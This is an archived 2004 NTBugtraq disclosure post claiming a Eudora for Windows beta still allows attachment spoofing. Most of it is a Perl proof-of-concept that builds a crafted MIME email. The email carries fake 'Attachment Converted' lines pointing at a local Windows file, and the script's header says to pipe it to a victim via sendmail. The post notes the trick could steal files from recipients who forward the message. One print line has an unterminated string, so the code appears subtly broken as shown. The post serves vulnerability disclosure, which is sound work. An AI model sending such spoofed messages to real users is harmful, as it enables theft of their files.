Eudora attachment spoof

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 10/11/04

  • Next message: Abe Usher: "MonkeyShell: using XML-RPC for access to a remote shell"
    Date:         Mon, 11 Oct 2004 08:23:53 +1000

    Eudora for Windows is in beta testing since 8 Oct 2004. The release

    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Not so. Harmless demo below.


    Paul Szabo -
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files (after a warning?)
    if the message was forwarded (not replied to).\n";

    print "\n--zzz\n";
    print "Content-Type: text/html; name=\"qp.txt\"\n";
    print "Content-Transfer-Encoding: quoted-printable \n";
    print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
    print "Within text/html part, use </x-html> to get back to plaintext,
    no need for NUL or linebreak or nothing:
    print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted=
    : \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

    print "\n--zzz--\n";

    NTBugtraq Editor's Note:
    Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field.

  • Next message: Abe Usher: "MonkeyShell: using XML-RPC for access to a remote shell"